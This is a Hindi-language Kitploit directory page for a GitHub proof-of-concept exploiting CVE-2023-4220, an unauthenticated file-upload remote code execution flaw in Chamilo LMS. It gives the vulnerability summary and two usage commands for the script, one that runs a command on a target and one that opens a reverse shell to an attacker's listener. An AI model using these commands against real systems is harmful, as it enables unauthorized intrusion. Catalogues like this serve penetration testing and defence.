Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-4226-POC — CVE-2023-4220 के लिए POC - Chamilo LMS में बिना प्रमाणीकरण के बड़ी फ़ाइल अपलोड द्वारा रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/krishnan-tech/cve-2023-4226-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubkrishnan-tech/cve-2023-4226-poc

CVE-2023-4226-POC

CVE-2023-4220 के लिए POC - Chamilo LMS में बिना प्रमाणीकरण के बड़ी फ़ाइल अपलोड द्वारा रिमोट कोड निष्पादन

रिपॉजिटरी देखें
1112 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-4220 POC

CVE-2023-4220 के बारे में अधिक जानकारी: StarLabs Advisory

सारांश

उत्पादChamilo
विक्रेताChamilo
गंभीरताउच्च - प्रतिद्वंद्वी सॉफ़्टवेयर कमजोरियों का शोषण करके बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन प्राप्त कर सकते हैं।
प्रभावित संस्करण<= v1.11.24
परीक्षण किए गए संस्करणv1.11.24 (लेखन के समय नवीनतम संस्करण)
CVE पहचानकर्ताCVE-2023-4220
CVE विवरणChamilo LMS <= v1.11.24 में /main/inc/lib/javascript/bigupload/inc/bigUpload.php में बड़ी फ़ाइल अपलोड कार्यक्षमता में अप्रतिबंधित फ़ाइल अपलोड, बिना प्रमाणीकरण के हमलावरों को संग्रहीत क्रॉस-साइट स्क्रिप्टिंग हमले करने और वेब शेल अपलोड करके दूरस्थ कोड निष्पादन प्राप्त करने की अनुमति देता है।
CWE वर्गीकरणCWE-434: खतरनाक प्रकार वाली फ़ाइल का अप्रतिबंधित अपलोड
CAPEC वर्गीकरणCAPEC-650: वेब सर्वर पर वेब शेल अपलोड करना

अवधारणा का प्रमाण (PoC)

सीधे कमांड निष्पादित करें

सीधे कमांड निष्पादित करने के लिए, निम्नलिखित कमांड का उपयोग करें:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami

रिवर्स शेल प्राप्त करें

रिवर्स शेल प्राप्त करने के लिए, निम्नलिखित कमांड का उपयोग करें:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>

टूल डाउनलोड करें